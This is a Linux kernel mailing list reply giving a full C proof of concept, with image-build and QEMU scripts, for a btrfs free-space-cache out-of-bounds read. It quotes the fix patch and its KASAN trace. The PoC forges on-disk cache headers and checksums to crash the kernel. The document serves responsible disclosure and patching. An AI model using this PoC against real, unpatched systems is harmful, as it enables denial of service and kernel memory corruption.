Re: [PATCH btrfs v2] btrfs: reject free space cache with more entries than pages

From: Xiang Mei

Date: Wed Jun 10 2026 - 13:52:00 EST


Thanks for your attention to this bug. We provide the PoC and method
to trigger the bug in this email.

1) Compile the kernel with the following config
CONFIG:
```
CONFIG_BTRFS_FS=y
CONFIG_BTRFS_ASSERT=n
```

2) Build the image with
```sh
#!/bin/sh
set -e
OUT="${1:-base.img}"
SIZE="${2:-2G}"

rm -f "$OUT"
truncate -s "$SIZE" "$OUT"
mkfs.btrfs -O ^free-space-tree -f "$OUT" >/dev/null
echo "wrote clean v1-cache btrfs image: $OUT ($SIZE)"
```

3) Run Qemu with
```sh
#!/bin/sh
set -e

qemu-system-x86_64 \
-m 2G -smp 2 -enable-kvm -cpu host \
-nographic -no-reboot \
-kernel bzImage \
-drive file=rootfs.img,if=virtio,format=raw \
-drive file=base.img,if=virtio,format=raw \
-append "console=ttyS0 root=/dev/vda rw nokaslr oops=panic panic=-1"
```

4) Use the following PoC to trigger the bug
```c
// SPDX-License-Identifier: GPL-2.0
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mount.h>
#include <sys/ioctl.h>

#ifndef DEV
#define DEV "/dev/vdc"
#endif
#define MNT "/mnt"
#define NODESIZE 16384
#define SECTOR 4096
#define HDR 0x65
#define ITEM 25
#define FSH_SIZE 41
#define NEW_ENTRIES 0x10000
static const uint64_t FREE_SPACE_OBJECTID = (uint64_t)(-11);

static uint32_t crc32c(const uint8_t *p, size_t n)
{
uint32_t crc = ~0u;
for (size_t i = 0; i < n; i++) {
crc ^= p[i];
for (int k = 0; k < 8; k++)
crc = (crc >> 1) ^ (0x82F63B78u &
(-(int32_t)(crc & 1)));
}
return ~crc;
}

static uint64_t rd64(const uint8_t *p){ uint64_t v; memcpy(&v,p,8); return v; }
static uint32_t rd32(const uint8_t *p){ uint32_t v; memcpy(&v,p,4); return v; }
static void wr64(uint8_t *p, uint64_t v){ memcpy(p,&v,8); }
static void wr32(uint8_t *p, uint32_t v){ memcpy(p,&v,4); }

static uint64_t logical_to_phys(uint8_t *m, off_t sz, uint64_t logical)
{
for (off_t off = 0; off + HDR <= sz; off += SECTOR) {
if (m[off + 0x64] != 0)
continue;
uint32_t nritems = rd32(m + off + 0x60);
if (nritems == 0 || nritems > 2000)
continue;
for (uint32_t i = 0; i < nritems; i++) {
off_t ip = off + HDR + (off_t)i * ITEM;
if (ip + ITEM > sz) break;
if (rd64(m + ip) != 256 || m[ip + 8] != 228)
continue;
uint64_t koff = rd64(m + ip + 9);
off_t dp = off + HDR + rd32(m + ip + 17);
if (dp + 64 > sz) continue;
uint64_t length = rd64(m + dp);
if (logical >= koff && logical < koff + length)
return rd64(m + dp + 48 + 8) + (logical - koff);
}
}
return logical;
}

static void forge_cache_page(uint8_t *m, off_t sz, uint64_t ino)
{
for (off_t off = 0; off + HDR <= sz; off += SECTOR) {
if (m[off + 0x64] != 0)
continue;
uint32_t nritems = rd32(m + off + 0x60);
if (nritems == 0 || nritems > 2000)
continue;
for (uint32_t i = 0; i < nritems; i++) {
off_t ip = off + HDR + (off_t)i * ITEM;
if (ip + ITEM > sz) break;
if (rd64(m + ip) != ino || m[ip + 8] != 108)
continue;
off_t dp = off + HDR + rd32(m + ip + 17);
if (dp + 53 > sz) continue;
uint64_t disk_bytenr = rd64(m + dp + 21);
if (disk_bytenr == 0)
continue;
uint64_t num_bytes = rd64(m + dp + 45);
int num_pages = num_bytes / 4096;
if (num_pages < 1) num_pages = 1;
off_t base = logical_to_phys(m, sz, disk_bytenr);
if (base + (off_t)num_bytes > sz) continue;
uint8_t *p0 = m + base;
int crc_area = 4 * num_pages;
uint64_t voff = 0x4000000ULL;
for (int pg = 0; pg < num_pages; pg++) {
uint8_t *p = p0 + (off_t)pg * 4096;
int e = (pg == 0) ? (crc_area + 8) : 0;
for (; e + 17 <= 4096; e += 17) {
wr64(p + e, voff);
wr64(p + e + 8, 0x1000);
p[e + 16] = 1;
voff += 0x100000ULL;
}
}
for (int pg = 1; pg < num_pages; pg++)
wr32(p0 + pg * 4, crc32c(p0 +
(off_t)pg * 4096, 4096));
wr32(p0 + 0, crc32c(p0 + crc_area, 4096 - crc_area));
return;
}
}
}

static int patch_device(const char *dev)
{
int fd = open(dev, O_RDWR);
if (fd < 0) { perror("open"); return -1; }
off_t sz = lseek(fd, 0, SEEK_END);
uint8_t *m = malloc(sz);
lseek(fd, 0, SEEK_SET);
for (off_t got = 0; got < sz; ) {
ssize_t r = read(fd, m + got, sz - got);
if (r <= 0) break;
got += r;
}

int patched = 0;
for (off_t off = 0; off + HDR <= sz; off += SECTOR) {
if (m[off + 0x64] != 0)
continue;
uint32_t nritems = rd32(m + off + 0x60);
if (nritems == 0 || nritems > 2000)
continue;
int hit = 0;
for (uint32_t i = 0; i < nritems; i++) {
off_t ip = off + HDR + (off_t)i * ITEM;
if (ip + ITEM > sz) break;
uint32_t isize = rd32(m + ip + 21);
if (rd64(m + ip) != FREE_SPACE_OBJECTID ||
m[ip + 8] != 0 || isize != FSH_SIZE)
continue;
off_t dptr = off + HDR + rd32(m + ip + 17);
if (dptr + FSH_SIZE > sz) continue;
uint64_t fino = rd64(m + dptr + 0);
wr64(m + dptr + 25, NEW_ENTRIES);
forge_cache_page(m, sz, fino);
hit = 1; patched++;
}
if (hit)
wr32(m + off, crc32c(m + off + 0x20, NODESIZE - 0x20));
}
lseek(fd, 0, SEEK_SET);
for (off_t wr = 0; wr < sz; ) {
ssize_t w = write(fd, m + wr, sz - wr);
if (w <= 0) break;
wr += w;
}
fsync(fd);
close(fd);
free(m);
return patched;
}

#define BTRFS_IOC_SYNC _IO(0x94, 8)

static int mnt_v1(void)
{
return mount(DEV, MNT, "btrfs", 0, "space_cache=v1");
}

static void churn(void)
{
static char b[1 << 20];
memset(b, 'F', sizeof b);
for (int i = 0; i < 300; i++) {
char p[64]; snprintf(p, sizeof p, MNT "/b%03d", i);
int fd = open(p, O_CREAT | O_WRONLY, 0644);
if (fd >= 0) { (void)!write(fd, b, sizeof b);
fsync(fd); close(fd); }
}
sync();
for (int i = 0; i < 300; i += 3) {
char p[64]; snprintf(p, sizeof p, MNT "/b%03d", i);
unlink(p);
}
sync();
}

static void bake_cache(void)
{
static char big[8 << 20];
memset(big, 'D', sizeof big);

mnt_v1();
int dfd = open(MNT, O_RDONLY | O_DIRECTORY);
churn();
for (int cyc = 0; cyc < 10; cyc++) {
char p[64]; snprintf(p, sizeof p, MNT "/dirty%d", cyc);
int t = open(p, O_CREAT | O_WRONLY, 0644);
if (t >= 0) { (void)!write(t, big, sizeof big);
fsync(t); close(t); }
if (cyc > 0) {
char q[64]; snprintf(q, sizeof q, MNT
"/dirty%d", cyc - 1);
unlink(q);
}
if (dfd >= 0) ioctl(dfd, BTRFS_IOC_SYNC, 0);
sync();
}
if (dfd >= 0) close(dfd);
umount(MNT);

if (mnt_v1() == 0) {
int t = open(MNT "/again", O_CREAT | O_WRONLY, 0644);
if (t >= 0) { (void)!write(t, "y", 1); close(t); }
churn(); sync(); sleep(1); umount(MNT);
}
if (mnt_v1() == 0) {
int t = open(MNT "/again2", O_CREAT | O_WRONLY, 0644);
if (t >= 0) { (void)!write(t, "z", 1); close(t); }
sync(); sleep(1); umount(MNT);
}
}

int main(void)
{
mkdir(MNT, 0755);

bake_cache();
puts("[poc] baked v1 cache");

printf("[poc] patched %d header(s)\n", patch_device(DEV));

if (mnt_v1()) {
perror("[poc] mount(trigger)");
return 1;
}
puts("[poc] remounted; allocating to force block-group caching");
for (int i = 0; i < 8; i++) {
char p[64]; snprintf(p, sizeof p, MNT "/t%d", i);
int fd = open(p, O_CREAT | O_WRONLY, 0644);
if (fd >= 0) {
char b[65536]; memset(b, 'a' + i, sizeof b);
for (int j = 0; j < 16; j++)
if (write(fd, b, sizeof b) < 0) break;
fsync(fd); close(fd);
}
}
sync();
sleep(2);
puts("[poc] no crash (kernel is patched?)");
return 0;
}
```


Feel free to let us know if you'd like more information about this
bug. We are glad to help.

Best,
Xiang

On Wed, Jun 10, 2026 at 10:29 AM Xiang Mei <xmei5@xxxxxxx> wrote:
>
> When loading a v1 free space cache, __load_free_space_cache() takes
> num_entries and num_bitmaps straight from the on-disk
> btrfs_free_space_header. That header is stored in the tree_root under a key
> with type 0, which the tree-checker has no case for, so neither count is
> validated before the load trusts it.
>
> The load loops num_entries times and maps the next page whenever the current
> one runs out, going through io_ctl_check_crc() -> io_ctl_map_page(), which
> does io_ctl->pages[io_ctl->index++]. But pages[] is allocated in
> io_ctl_init() from the cache inode's i_size, not from num_entries:
>
> num_pages = DIV_ROUND_UP(i_size_read(inode), PAGE_SIZE);
> io_ctl->pages = kcalloc(num_pages, sizeof(struct page *), GFP_NOFS);
>
> So if num_entries claims more records than the pages can hold, io_ctl->index
> runs off the end of pages[]. The write side never hits this because
> io_ctl_add_entry() and io_ctl_add_bitmap() both stop once
> io_ctl->index >= io_ctl->num_pages; the read side just never had the same
> check.
>
> To trigger it, take a clean cache (num_entries = <N> here), set num_entries
> in the header to 0x10000, and fix up the leaf checksum so it still passes
> the tree-checker. The cache inode has i_size = 65536, so num_pages is 16 and
> pages[] is a 16-pointer (kmalloc-128) array. The load now tries to read
> 65536 entries, io_ctl->index walks up to 16, and pages[16] is read past the
> array:
>
> BUG: KASAN: slab-out-of-bounds in io_ctl_check_crc (fs/btrfs/free-space-cache.c:420 fs/btrfs/free-space-cache.c:565)
> Read of size 8 at addr ffff88800c833a80 by task kworker/u8:3/58
> io_ctl_check_crc (fs/btrfs/free-space-cache.c:420 fs/btrfs/free-space-cache.c:565)
> __load_free_space_cache (fs/btrfs/free-space-cache.c:655 fs/btrfs/free-space-cache.c:820)
> load_free_space_cache (fs/btrfs/free-space-cache.c:1017)
> caching_thread (fs/btrfs/block-group.c:880)
> btrfs_work_helper (fs/btrfs/async-thread.c:312)
> process_one_work
> worker_thread
> kthread
> ret_from_fork
>
> free-space-cache.c:420 is io_ctl_map_page(), inlined into io_ctl_check_crc()
> at line 565, which is why that is the frame KASAN names. The out-of-bounds
> slot is then treated as a struct page and handed to crc32c(), so the bad
> read turns into a GP fault.
>
> Add the missing check to io_ctl_check_crc(), which is where both the entry
> loop and the bitmap loop end up. When num_entries is too large the load now
> fails like any corrupt cache: __load_free_space_cache() drops it and rebuilds
> the free space from the extent tree, so a valid cache is never rejected.
>
> Fixes: 5b0e95bf607d ("Btrfs: inline checksums into the disk free space cache")
> Reported-by: Weiming Shi <bestswngs@xxxxxxxxx>
> Assisted-by: Claude:claude-opus-4-8
> Signed-off-by: Xiang Mei <xmei5@xxxxxxx>
> ---
> v2: add more details in the commit message
>
> fs/btrfs/free-space-cache.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
> index ab22e4f9ffdd..bbc4db7fe74b 100644
> --- a/fs/btrfs/free-space-cache.c
> +++ b/fs/btrfs/free-space-cache.c
> @@ -555,6 +555,9 @@ static int io_ctl_check_crc(struct btrfs_io_ctl *io_ctl, int index)
> u32 crc = ~(u32)0;
> unsigned offset = 0;
>
> + if (index >= io_ctl->num_pages)
> + return -EIO;
> +
> if (index == 0)
> offset = sizeof(u32) * io_ctl->num_pages;
>
> --
> 2.43.0
>